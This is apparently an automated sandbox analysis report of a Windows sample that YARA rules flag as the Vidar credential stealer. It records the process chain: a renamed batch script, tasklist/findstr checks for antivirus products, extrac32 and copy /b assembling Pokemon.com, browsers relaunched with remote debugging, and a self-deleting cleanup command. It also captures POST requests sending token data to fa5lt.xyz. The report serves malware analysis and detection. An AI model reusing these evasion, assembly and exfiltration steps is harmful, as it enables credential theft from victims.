                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 9876
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; msnup=
2024-12-27 13:47:38 UTC | 9876 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T13:47:35.839Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"loca
2024-12-27 13:47:39 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=80fecc27c9a34e55bb4bfd4b5e6e7c9d&HASH=80fe&LV=202412&V=4&LU=1735307258804; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=a8600d46cdc44eed8885d3cc76e5cfe7; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2964
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:38 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50027 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:38 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:38 UTC | 331 | OUT | Data Ascii: ------R1DBSJMYMYM7QI5FCJM7Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------R1DBSJMYMYM7QI5FCJM7Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------R1DBSJMYMYM7QI5FCJM7Cont
2024-12-27 13:47:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:39 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:47:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50034 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:41 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8QIEKNOZMOZU37QQQIWL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:41 UTC | 331 | OUT | Data Ascii: ------8QIEKNOZMOZU37QQQIWLContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------8QIEKNOZMOZU37QQQIWLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8QIEKNOZMOZU37QQQIWLCont
2024-12-27 13:47:41 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:47:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0



Target ID: 0
Start time: 08:45:55
Start date: 27/12/2024
Path: C:\Users\user\Desktop\JA7cOAGHym.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\JA7cOAGHym.exe"
Imagebase: 0x400000
File size: 1'199'374 bytes
MD5 hash: 6E90F0E42285206DCE01FFBBD748B081
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:45:56
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 08:45:56
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID:4
Start time:08:45:57
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xd50000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:08:45:57
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0xba0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:08:45:58
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xd50000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:08:45:58
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0xba0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:08:45:59
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 208079
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:08:45:59
Start date:27/12/2024
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:extrac32 /Y /E Validation
Imagebase:0x2a0000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:08:45:59
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "SAO" Offering
Imagebase:0xba0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:08:45:59
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture y
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:08:46:00
Start date:27/12/2024
Path:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Wow64 process (32bit):true
Commandline:Pokemon.com y
Imagebase:0x90000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:13
Start time:08:46:00
Start date:27/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0x870000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:08:46:55
Start date:27/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:08:46:56
Start date:27/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8
Imagebase:0x7ff6068e0000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:08:47:09
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:08:47:11
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                    Start time:08:47:11
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                    Start time:08:47:11
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                    Start time:08:47:15
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                                                    Start time:08:47:15
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                    Start time:08:47:41
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exit
                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                    Start time:08:47:41
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                    Start time:08:47:41
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                    Imagebase:0x9c0000
                                                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true


Execution Graph

Execution Coverage:17.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:25
3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 
405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 
